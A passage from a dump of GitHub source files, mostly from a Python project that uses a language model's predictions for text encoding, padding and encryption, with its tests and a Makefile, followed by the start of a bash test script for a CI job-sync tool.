unittest\nfrom random import choice\nfrom encoding import encode, decode\nfrom mock_model import mock_model, config\n\nclass TestModel(unittest.TestCase):\n\n def test_predict(self):\n cfg = config()\n cfg['model']['alphabet'] = \"01\"\n model = mock_model(cfg)\n sequence = \"001\"\n result = model.predict(sequence)\n\n # Ensure we're one-hot encoding\n self.assertEqual(model.model.last_sequence.tolist(), [[[True, False], [True, False], [False, True]]])\n\n # Ensure we're normalizing probabilities\n self.assertEqual(result.tolist(), [0.5, 0.5])\n\n def test_sample(self):\n model = mock_model()\n\n sequence = model.sample(0)\n self.assertEqual(0, len(sequence))\n\n sequence = model.sample(100)\n self.assertEqual(100, len(sequence))\n\n # This assert is non-deterministic, but should always pass.\n # Could in theory get a sequence of all '0's or something though.\n self.assertEqual(set(model.config.model.alphabet), set(sequence))\n\n def test_translations(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"ab\", \"01\"]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abab\"), \"0101\")\n\n def test_substitutions(self):\n cfg = config()\n cfg['transformations']['substitutions'] = [[\"ab\", \"0\"], [\"ba\", \"1\"]]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abba\"), \"01\")\n\n def test_translation_and_substitution(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"ab\", \"01\"]\n cfg['transformations']['substitutions'] = [[\"11\", \"1\"], [\"01\", \"1\"], [\"10\", \"0\"]]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abba\"), \"0\")\n\n def test_invalid_transformation(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"01\", \"ab\"]\n cfg['transformations']['substitutions'] = [[\"a\", \"aa\"], [\"b\", \"bb\"]]\n model = mock_model(cfg)\n with self.assertRaises(Exception):\n model.transform(\"0101\")\n" }, { "alpha_fraction": 0.6390010118484497, "alphanum_fraction": 0.6652371287345886, "avg_line_length": 36.046730041503906, "blob_id": "98a29c03723158319dca0bf66f2ae76c05ef73dc", "content_id": "ffa241f34a17aec7c34418bd38cebe09f8e2508d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3964, "license_type": "no_license", "max_line_length": 81, "num_lines": 107, "path": "/src/util/modeling.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from .sampling import choose_choice, choose_weight\nfrom .math import scale\nfrom .packing import MAX_INT\n\ndef tabulate(model, initial, values, novelty=None):\n \"\"\"Given a sequence of values, this returns a list of random integer\n weights drawn from to ranges corresponding to the model's probability of\n predicting each value.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> list(tabulate(model, initial, \"HELLO\"))\n [3248025205, 3874735365, 4292362767, 3915527017, 4267391621]\n >> \"\".join(recite(model, initial, _))\n \"HELLO\"\n\n Args:\n model (Model): The model to use for predictions.\n\n initial (list): The initial sequence to feed to the model.\n\n values (list): The values to generate weights for.\n\n novelty (float, optional): The conservativeness of the predictions.\n\n Return (generator(int)):\n A list of randomized weights corresponding to the model's probability\n of predicting each value.\n \"\"\"\n alphabet = model.config.model.alphabet\n\n def fn(value, weights):\n weight = choose_weight(value, alphabet, weights)\n return (value, weight)\n\n return _scan_model(model, fn, initial, values, novelty)\n\ndef recite(model, initial, weights, novelty=None):\n \"\"\"Given a sequence of weights, this returns the values that correspond to\n the model's predictions for each weight.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> weights = [3248025205, 3874735365, 4292362767, 3915527017, 4267391621]\n >> list(recite(model, initial, weights))\n ['H', 'E', 'L', 'L', 'O']\n\n Args:\n model (Model): The model to use for predictions.\n\n initial (list): The initial sequence to feed to the model.\n\n weights (list(int)): The weights to use when choosing values.\n\n novelty (float, optional): The conservativeness of the predictions.\n\n Returns (generator):\n A sequence of values as chosen by the provided weights.\n \"\"\"\n alphabet = model.config.model.alphabet\n\n def fn(weight, weights):\n value = choose_choice(weight, alphabet, weights)\n return (value, value)\n\n return _scan_model(model, fn, initial, weights, novelty)\n\ndef _scan_model(model, fn, init, xs, novelty=None):\n \"\"\"For every value in `xs`, this calls `fn` with both the value and the\n weights of the model's current predictions. The sequence being fed to the\n model is then updated, and we repeat the process.\n\n The function, `fn`, returns two values. This function accumulates the\n second of these values and returns them in a generator.\n\n This function is similar in spirit to Haskell's scanl, but applied to a\n model instead of a list. Scanl is just like reduce in Python, but every\n intermediate value gets returned instead of just the final accumulated\n value.\n\n See `tabulate` and `recite` for example usage.\n\n Args:\n model (Model): The model to use for predictions.\n\n fn (function): A function that takes a value and a list of weights and\n returns the next value in a sequence for the model, as well as a\n value to be accumulated and returned from this function.\n\n init (list): The initial values to feed to the model.\n\n xs (list): The values to feed to `fn`.\n\n novelty (float): The conservativeness of the predictions.\n\n Returns (generator):\n A sequence of the values computed by `fn`.\n \"\"\"\n sequence_length = model.config.model.sequence_length\n sequence = init[-sequence_length:]\n for x in xs:\n probabilities = model.predict(sequence, novelty)\n # We use (MAX_INT + 1) because weights are chosen 0 <= w <= MAX_INT\n scaled = scale(probabilities, MAX_INT + 1, lowest=1)\n (next_value, y) = fn(x, scaled)\n yield y\n sequence = (sequence + [next_value])[-sequence_length:]\n" }, { "alpha_fraction": 0.6836419701576233, "alphanum_fraction": 0.709876537322998, "avg_line_length": 45.28571319580078, "blob_id": "cbadef2aabce169f121d839795a798a8c666bc58", "content_id": "505b536fead0ca065be193f844739b11854e6401", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 648, "license_type": "no_license", "max_line_length": 83, "num_lines": 14, "path": "/Makefile", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "test:\n\tPYTHONPATH='src':'tests' python -m unittest discover -s . -p '*_tests.py'\n\n# Usage: make HOST=127.0.0.1 CUDNN_TARBALL=~/cudnn-8.0-linux-x64-v5.1.tgz ec2_setup\n# The cudnn tarball can't be downloaded without being authenticated on NVidia's\n# developer portal. It's lame. That's why we need to download locally and then\n# upload to remote machine.\n# Assumes running Ubuntu on g2.2xlarge or p2.xlarge (or equivalent)\nec2_setup:\n\tscp $$CUDNN_TARBALL ubuntu@$$HOST:~/\n\tscp ./src/setup.sh ubuntu@$$HOST:~/\n\tssh ubuntu@$$HOST 'sh ~/setup.sh'\n\t@echo \"*** Remote environment is ready. ***\"\n\t@echo \"Run 'ssh ubuntu@$$HOST' to start using menc there.\"\n" }, { "alpha_fraction": 0.6399644613265991, "alphanum_fraction": 0.6433392763137817, "avg_line_length": 34.632911682128906, "blob_id": "85bfc592d359b103a0a8cad378cfee9a41f52704", "content_id": "17e72ae0db9848409990dfdcf7921835001a280e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5630, "license_type": "no_license", "max_line_length": 140, "num_lines": 158, "path": "/src/util/padding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\nfrom .modeling import recite\nfrom .lists import drop_tail_until\nfrom .packing import BYTES_IN_INT\nfrom .randoms import random_ints\n\nRAND = SystemRandom()\n\ndef pad(model, initial, values, blocksize):\n \"\"\"Extends the provided values with model predictions to make the total\n length of (initial + values) equal to a multiple of blocksize.\n\n We do this by continuously generating potential suffixes until a boundary\n is hit. Once a boundary is hit (e.g. a full token is formed), we split the\n token into prefixes that when appended to the provided payload will result\n in a new payload that is the correct length.\n\n Of these candidate prefixes, we then uniformly sample them and choose one\n to use as padding.\n\n This process ensures that the payload always ends with a partial or\n complete token (with or without the trailing boundary character).\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> padd(model, initial, list(\"HELLO\"), 16)\n ['H', 'E', 'L', 'L', 'O', ' ', 'M', 'U', 'C']\n >> pad(model, initial, list(\"FOO \"), 16)\n ['F', 'O', 'O', ' ', 'F', 'R', 'O', 'M', ' ']\n >> \"\".join(_)\n 'FOO FROM '\n\n Args:\n model (Model): The model to use for encoding.\n\n initial (list): The initial sequence used to seed the model.\n\n values (list): The values to pad.\n\n blocksize (int): The mutliple that we need to pad to.\n\n Returns:\n A list of values + padding.\n\n Raises:\n ValueError: If blocksize is not a multiple of 4 or greater than 0.\n\n Exception: If padding fails to generate. This is a non-deterministic\n process, so trying again may work. This is extremely unlikely to be\n raised if you have any reasonable padding_novelty_growth_rate and\n max_padding_trials in your config.\n \"\"\"\n\n if blocksize < 1 or blocksize % BYTES_IN_INT != 0:\n raise ValueError(\"Blocksize must be greater than 0.\")\n\n boundary = model.config.model.boundary\n if len(values) == 0 or values[-1] != boundary:\n values = values + [boundary]\n\n length = _base_length(model, values)\n block_capacity = blocksize // BYTES_IN_INT\n first_length = block_capacity - (length % block_capacity)\n joined = initial + values\n\n for token in _tokens(model, joined):\n if len(token) >= first_length:\n offsets = range(first_length, len(token) + 1, block_capacity)\n token_prefixes = [token[:j] for j in offsets]\n padding = RAND.choice(token_prefixes)\n return values + padding\n\n raise Exception(\"Failed to generate padding. This is non-deterministic. Run again or try increasing padding_novelty_growth_rate count.\")\n\ndef unpad(model, values):\n \"\"\"Removes the last token (including any trailing boundaries) from values.\n\n Example:\n >> unpad(model, \"FOO BAR \")\n 'FOO '\n >> unpad(model, \"HELLO MUC\")\n 'HELLO '\n >> unpad(model, \"HELLO \")\n 'HELLO'\n >> unpad(model, \"HELLO\")\n 'HELLO'\n\n Args:\n model (Model): The model that was used to pad this input.\n\n values (list): The values to remove padding from.\n\n Returns:\n A copy of `values` with the last token removed, or unchanged if there\n is only one token.\n \"\"\"\n boundary = model.config.model.boundary\n\n # Trim boundary if it's on the end then drop token.\n if len(values) > 0 and values[-1] == boundary:\n values = values[:-1]\n\n return drop_tail_until(boundary, values)\n\ndef _tokens(model, base):\n \"\"\" Generates a stream of tokens with increasing novelty. \"\"\"\n for novelty in _novelities(model):\n yield _generate_token(model, base, novelty)\n\ndef _novelities(model):\n \"\"\" A sequence of increasing novelities. \"\"\"\n trials = model.config.encoding.max_padding_trials\n growth_rate = model.config.encoding.padding_novelty_growth_rate\n novelty = model.config.encoding.novelty\n for i in range(trials):\n yield novelty * (growth_rate ** i)\n\ndef _generate_token(model, start, novelty):\n \"\"\"Generates a random single token following the `start` sequence.\n\n Note: If the probability of generating a boundary character is low then\n this could take a while to run. It won't stop trying to generate values\n until it succeeds in generating a boundary.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> _generate_token(model, initial, 1.0)\n ['A', 'N', 'D', ' ']\n >> _generate_token(model, initial, 1.0)\n ['M', 'E', 'A', 'N', 'S', ' ']\n\n Args:\n model (Model): The model to be used for prediction.\n\n start (list): The sequence to generate a subsequent token for.\n\n novelty (float): The conservativeness of the token generation.\n\n Returns:\n A random token that the model believes would reasonably follow the\n provided sequence.\n \"\"\"\n # Non-deterministic. If `boundary` has a low prob of being generated, this\n # could take a while to run.\n boundary = model.config.model.boundary\n stream = recite(model, start, random_ints(), novelty) # Infinite stream\n token = []\n for c in stream:\n token.append(c)\n if c == boundary:\n return token\n\ndef _base_length(model, values):\n \"\"\" Returns the length of the payload without padding. \"\"\"\n init = model.config.model.sequence_length\n norm = model.config.encoding.normalizing_length\n prim = model.config.encoding.priming_length\n return init + norm + prim + len(values)\n" }, { "alpha_fraction": 0.6159090995788574, "alphanum_fraction": 0.6280303001403809, "avg_line_length": 43, "blob_id": "d26beb4c96575e75b06a77b1c27ad805d9d11ce5", "content_id": "3f5f45366a2516f71418b75189edca2bdee3747f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 91, "num_lines": 30, "path": "/tests/encryption_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom encryption import encrypt, decrypt\nfrom mock_model import mock_model\n\nclass TestEncryption(unittest.TestCase):\n\n def test_encryption(self):\n \"\"\" Test round-trip encryption.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # If message doesn't end in boundary, it should be appended.\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"\")), \"0\")\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"0\")), \"0\")\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"1\")), \"10\")\n\n # Test a bunch of random messges of varying lengths\n for i in range(30):\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decrypt(model, \"foo\", encrypt(model, \"foo\", message))\n self.assertEqual(message, result)\n\n # Test a bunch of random messges using wrong key\n for i in range(60, 90): # Short bit strings may match by chance, so we go long\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decrypt(model, \"bar\", encrypt(model, \"foo\", message))\n self.assertNotEqual(message, result)\n" }, { "alpha_fraction": 0.5205913186073303, "alphanum_fraction": 0.5533263087272644, "avg_line_length": 36.880001068115234, "blob_id": "fa54836cb7384ebf5db4debf2a82eb2247d07d3d", "content_id": "db7446778fe52121c610529cde7b0f0d4d52aed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2841, "license_type": "no_license", "max_line_length": 69, "num_lines": 75, "path": "/tests/util/sampling_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.sampling import choose_choice, choose_weight\n\nclass TestSampling(unittest.TestCase):\n\n def test_sampling(self):\n \"\"\" This is a non-deterministic round-trip test. \"\"\"\n for _ in range(10):\n choices = [1, 2, 3, 4, 5]\n weights = [1, 2, 3, 4, 5]\n for choice in choices:\n weight = choose_weight(choice, choices, weights)\n chosen = choose_choice(weight, choices, weights)\n self.assertEqual(choice, chosen)\n\n def test_choose_choice(self):\n # No negative weights\n with self.assertRaises(ValueError):\n choose_choice(-1, [], [])\n\n # Weights and choices must be equal length\n with self.assertRaises(ValueError):\n choose_choice(0, [0], [])\n\n # Weights must sum to greater than weight\n with self.assertRaises(ValueError):\n choose_choice(2, [1, 0], [0, 1])\n\n # Can't have zero choices\n with self.assertRaises(ValueError):\n choose_choice(0, [], [])\n\n self.assertEqual(choose_choice(0, \"a\", [1]), \"a\")\n\n # Single weight\n self.assertEqual(choose_choice(0, \"a\", [2]), \"a\")\n self.assertEqual(choose_choice(1, \"a\", [2]), \"a\")\n\n # Uniform weight\n self.assertEqual(choose_choice(0, \"ab\", [1, 1]), \"a\")\n self.assertEqual(choose_choice(1, \"ab\", [1, 1]), \"b\")\n\n # Skewed weight\n self.assertEqual(choose_choice(0, \"ab\", [1, 2]), \"a\")\n self.assertEqual(choose_choice(1, \"ab\", [1, 2]), \"b\")\n self.assertEqual(choose_choice(2, \"ab\", [1, 2]), \"b\")\n\n # Zero weight\n self.assertEqual(choose_choice(0, \"abc\", [1, 0, 2]), \"a\")\n self.assertEqual(choose_choice(1, \"abc\", [1, 0, 2]), \"c\")\n self.assertEqual(choose_choice(2, \"abc\", [1, 0, 2]), \"c\")\n\n def test_choose_weight(self):\n # Weights and choices must be equal length\n with self.assertRaises(ValueError):\n choose_weight(\"a\", \"a\", [])\n\n # Choice must be present in choices\n with self.assertRaises(ValueError):\n choose_weight(\"b\", \"a\", [0])\n\n # Single choice\n self.assertEqual(choose_weight(\"a\", \"a\", [1]), 0)\n\n # Uniform determinisitic\n self.assertEqual(choose_weight(\"a\", \"ab\", [1,1]), 0)\n self.assertEqual(choose_weight(\"b\", \"ab\", [1,1]), 1)\n\n # Non-deterministic sampling here\n self.assertTrue(choose_weight(\"a\", \"abc\", [2,2,2]) in [0, 1])\n self.assertTrue(choose_weight(\"a\", \"abc\", [2,2,2]) in [0, 1])\n self.assertTrue(choose_weight(\"b\", \"abc\", [2,2,2]) in [2, 3])\n self.assertTrue(choose_weight(\"b\", \"abc\", [2,2,2]) in [2, 3])\n self.assertTrue(choose_weight(\"c\", \"abc\", [2,2,2]) in [4, 5])\n self.assertTrue(choose_weight(\"c\", \"abc\", [2,2,2]) in [4, 5])\n" }, { "alpha_fraction": 0.489673912525177, "alphanum_fraction": 0.5179347991943359, "avg_line_length": 23.53333282470703, "blob_id": "6926fcbfc1fd738d2426f3b58dac0a20cdd1795b", "content_id": "05a6ed8a9e8cbad932c7e2d2ed4e71e34fb44343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "no_license", "max_line_length": 76, "num_lines": 75, "path": "/src/util/lists.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from itertools import chain\n\ndef rfind(x, xs):\n \"\"\"Finds the right-most index of an element in a list.\n\n Example:\n >> rfind(3, [1, 2, 3, 1, 2, 3])\n 5\n >> rfind(4, [1, 2, 3, 1, 2, 3])\n None\n\n Args:\n x (obj): The element to find the index of.\n\n xs (list): The list to search through.\n\n Returns:\n The index of the right-most occurence of `x` in `xs`, or None if it\n isn't in the list.\n \"\"\"\n for i in range(len(xs) - 1, -1, -1):\n if xs[i] == x:\n return i\n return None\n\ndef drop_tail_until(x, xs):\n \"\"\"Removes all right-most elements from a list until a value is found.\n\n Example:\n >> drop_tail_until(1, [1, 2, 3, 1, 2, 3])\n [1, 2, 3, 1]\n >> drop_tail_until(4, [1, 2, 3, 1, 2, 3])\n [1, 2, 3, 1, 2, 3]\n\n Args:\n x (obj): The stopping value for dropping elements.\n\n xs (list): The list to drop values from.\n\n Returns:\n A copy of `xs` with anything after the right-most `x` value removed.\n \"\"\"\n last = rfind(x, xs)\n if last == None:\n return xs[:]\n return xs[:last + 1]\n\ndef take(n, xs):\n \"\"\"Takes the first `n` elements of `xs`.\n\n This is useful when `xs` is a generator.\n\n Example:\n >> gen = (i for i in range(5))\n >> take(3, gen)\n [0, 1, 2]\n >> take(2, gen)\n [3, 4]\n >> take(1, gen)\n []\n\n Args:\n n (int): The number of items to take from `xs`.\n\n xs (sequence): The sequence to take items from.\n\n Returns:\n A list of the first `n` items in `xs`. If `xs` doesn't have\n enough items then as many as can be drawn will be returned.\n \"\"\"\n return [x for (_, x) in zip(range(n), xs)]\n\ndef to_generator(xs):\n \"\"\" Converts a sequence to a generator. \"\"\"\n return (x for x in xs)\n" }, { "alpha_fraction": 0.6142454147338867, "alphanum_fraction": 0.6170662641525269, "avg_line_length": 31.976743698120117, "blob_id": "7ed02be6544bf0993ece7485e57c354261f34769", "content_id": "6fba4ceca12cf07eebd6918ce2daaa1959cec760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 79, "num_lines": 43, "path": "/src/util/one_hot_encoding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from numpy import zeros, argmax, array\nimport numpy as np\n\ndef one_hot_encoding(xs, classes):\n \"\"\"Given a list of values, converts them to one-hot encoding.\n\n One-hot encoding is an encoding where if you have N distinct possible\n classes, the value gets encoded as an array of size N where all values are\n zero except for the index corresponding to the class of the current value.\n\n Example:\n >> one_hot_encoding([0, 1, 2], range(3))\n [[ True, False, False],\n [False, True, False],\n [False, False, True]]\n\n >> one_hot_encoding(\"ace\", \"abcde\")\n [[ True, False, False, False, False],\n [False, False, True, False, False],\n [False, False, False, False, True]]\n\n Args:\n xs (list): The list of values to encode.\n\n classes (sequence): A sequence containing one of each possible class.\n\n Returns (numpy.array(bool)):\n A two-dimensional numpy array where each row contains an encoded value.\n\n Raises:\n ValueError: If a value is present in `xs` that isn't in `classes`.\n \"\"\"\n # Maps a class to it's corresponding index\n lookup = {x:i for i, x in enumerate(classes)}\n\n X = zeros((len(xs), len(classes)), dtype=np.bool)\n for i, x in enumerate(xs):\n if x not in lookup:\n raise ValueError(\"Value '%s' is not present in `classes`\" % (x))\n\n X[i, lookup[x]] = True\n\n return X\n" } ]
29
SergeiKo42/YandexTZ
https://github.com/SergeiKo42/YandexTZ
5d32c05f6ea77e01976db808d4b4baa0bab96a56
8641da4b85b804a515049da556db088b0db3a92a
6bef6637cf8fd1b2d043afaf17701c8ba61a900d
refs/heads/master
2020-08-24T23:27:26.421505
2019-10-22T23:32:32
2019-10-22T23:32:32
216,926,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5691244006156921, "alphanum_fraction": 0.5702764987945557, "avg_line_length": 27, "blob_id": "a58e3b87ef0e249cb0954c80cc7ab64025981ddc", "content_id": "be7a2f9bc493ae29a7eb37b47510857af5c71650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 868, "license_type": "no_license", "max_line_length": 95, "num_lines": 31, "path": "/main.py", "repo_name": "SergeiKo42/YandexTZ", "src_encoding": "UTF-8", "text": "import json\nimport unittest\n\n\nclass TestJsons(unittest.TestCase):\n orig_json = []\n out = {}\n\n def test_main(self):\n reconstructed_json = []\n for j in self.out:\n for k in out[j]:\n reconstructed_json.append({'shop': j, 'product': k})\n sorted_orig_json = sorted(self.orig_json, key=lambda l: l['shop'])\n sorted_reconstructed_json = sorted(reconstructed_json, key=lambda k: k['shop'])\n self.assertEqual(sorted_orig_json, sorted_reconstructed_json)\n\n\nif __name__ == '__main__':\n\n with open('task_2.json', 'r') as f:\n json = json.load(f)\n out = {}\n for i in json:\n out[i['shop']] = i['shop'] in out and out[i['shop']] + [i['product']] or [i['product']]\n print(\"Resulted Array: \\n %s\" % out)\n\n # Test\n TestJsons.orig_json = json\n TestJsons.out = out\n unittest.main()\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.7882353067398071, "avg_line_length": 16, "blob_id": "cd9f84756d8edba09f7f9e00e48c1369c578ec83", "content_id": "71f804b41fc59762eeb0b660bffc29a30ce31677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 146, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/README.md", "repo_name": "SergeiKo42/YandexTZ", "src_encoding": "UTF-8", "text": "# Yandex\n\nЗадача решается пятю строчками (или меньше)\n\nДобавил еще тест для проверки\n" } ]
2
VibAltekar/akhillinit
https://github.com/VibAltekar/akhillinit
aac74a2ed2a476a77daed96a0cf6acc16d2e9bd2
461173a42a60f43b4f0205bea9c42ae7487a2e44
d40fc0163845f106cc712ea71d04ae7a46e83c64
refs/heads/master
2021-09-14T19:24:33.409948
2018-05-17T22:06:20
2018-05-17T22:06:20
105,838,017
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5411471128463745, "alphanum_fraction": 0.561097264289856, "avg_line_length": 22.58823585510254, "blob_id": "4681882cb7aeadadc9d4fb2ab779dd1e4beb8385", "content_id": "354f884f92c63dfe502a9909351bbc029d7a1ded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 86, "num_lines": 17, "path": "/temp.py", "repo_name": "VibAltekar/akhillinit", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, session, redirect, jsonify\n\n\nimport os\napp = Flask(__name__)\n\n@app.route(\"/\",methods=[\"GET\",\"POST\"])\ndef hello():\n if request.method == \"POST\":\n a = request.json\n print(a)\n values = a[\"hi\"]\n os.system(\"say '\" + values + \"'\")\n return \"Hello\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=6969)\n" } ]
1
marticongost/woost.extensions.notices
https://github.com/marticongost/woost.extensions.notices
49a0471b899bdf48c2c7cb563c125b0f611170fa
2fb728236731a7019750c090de7a08237bcd08ac
53b57884e2fc81cef3310285e22b56f95c33000e
refs/heads/master
2020-08-16T17:15:24.478036
2019-07-25T10:43:52
2019-07-25T10:43:52
215,530,025
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 23.33333396911621, "blob_id": "cf6d637395f3cf77806cd841e365b69d541665b4", "content_id": "f2172bb58dffae991dc30e8a6e8ecac521a08ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 61, "num_lines": 9, "path": "/woost/extensions/notices/settings.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom cocktail import schema\nfrom cocktail.translations import translations\nfrom woost.models import add_setting\n\ntranslations.load_bundle(\"woost.extensions.notices.settings\")\n\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.641791045665741, "avg_line_length": 18.647058486938477, "blob_id": "0f971af6d2ac149475cb8e5679d3518c6eaf4ecf", "content_id": "7f2eaed2f8a32bb80ec31bce52d3a9cbb9177612", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/woost/extensions/notices/installation.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom woost.models import ExtensionAssets, BlocksCatalog\n\n\ndef install():\n \"\"\"Creates the assets required by the notices extension.\"\"\"\n\n assets = ExtensionAssets(\"notices\")\n\n assets.require(\n BlocksCatalog,\n \"blocks_catalog\",\n title = assets.TRANSLATIONS\n )\n\n" }, { "alpha_fraction": 0.6110183596611023, "alphanum_fraction": 0.6126878261566162, "avg_line_length": 21.148147583007812, "blob_id": "1ddf6ba4ce92acb2219d72bd13b5d81a386e35a2", "content_id": "7e852b804ee6666b64a822f935c7ec86209eb5b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 55, "num_lines": 27, "path": "/woost/extensions/notices/migration.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom cocktail.persistence import migration_step\nfrom woost.models import BlocksCatalog\n\n\n@migration_step\ndef preserve_woost2_data(e):\n\n from woost.models import Website\n\n catalog = BlocksCatalog.require_instance(\n qname=\"woost.extensions.notices.blocks_catalog\"\n )\n\n for website in Website.select():\n blocks = set()\n try:\n value = website._notices\n except AttributeError:\n pass\n else:\n del website._notices\n if value:\n catalog.blocks.extend(value)\n\n" } ]
3
matrixik/automation
https://github.com/matrixik/automation
246ffb20a148757a4071d64e0ebfa8a151f19abb
023485961465536988b4ff5698204f44e047bd9f
fab2579375178d47ad4ba123d46aa9d7e54348d8
refs/heads/master
2021-01-12T05:35:49.194947
2016-12-22T11:16:30
2016-12-22T11:16:30
77,140,386
1
0
null
2016-12-22T11:49:56
2016-12-09T07:19:31
2016-12-22T11:16:31
null
[ { "alpha_fraction": 0.6802431344985962, "alphanum_fraction": 0.7063829898834229, "avg_line_length": 32.53061294555664, "blob_id": "7cfcaab74f57235fb46426de248b87598248ea6c", "content_id": "10bc634c858746fa096fc9b5b1a224dab32ffe8d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1645, "license_type": "permissive", "max_line_length": 86, "num_lines": 49, "path": "/scripts/jtsync/test_jtsync", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\necho \"set (Cloud 7) cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 to failed\"\nbundle exec jtsync.rb --ci suse --job cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 1\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"set (Cloud 7) cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 to success\"\nbundle exec jtsync.rb --ci suse --job cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (cloud) to success\"\nbundle exec jtsync.rb --ci suse --matrix crowbar-trackupstream,Devel:Cloud:7:Staging 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (cloud) to failed\"\nbundle exec jtsync.rb --ci suse --matrix crowbar-trackupstream,Devel:Cloud:7:Staging 1\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (openstack)\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleanvm,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: search non existing job\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleannothing,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: invalid returncode\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleanvm,Juno a\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: invalid ci type\"\nbundle exec jtsync.rb --ci foobar --matrix openstack-cleanvm,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\n\n" }, { "alpha_fraction": 0.6417100429534912, "alphanum_fraction": 0.6451823115348816, "avg_line_length": 23.25263214111328, "blob_id": "fa50e690b7375933d144c30f00a7ac5968c5fe40", "content_id": "2a6eabf5691875d37b656a3c3eec479f2b2b0784", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 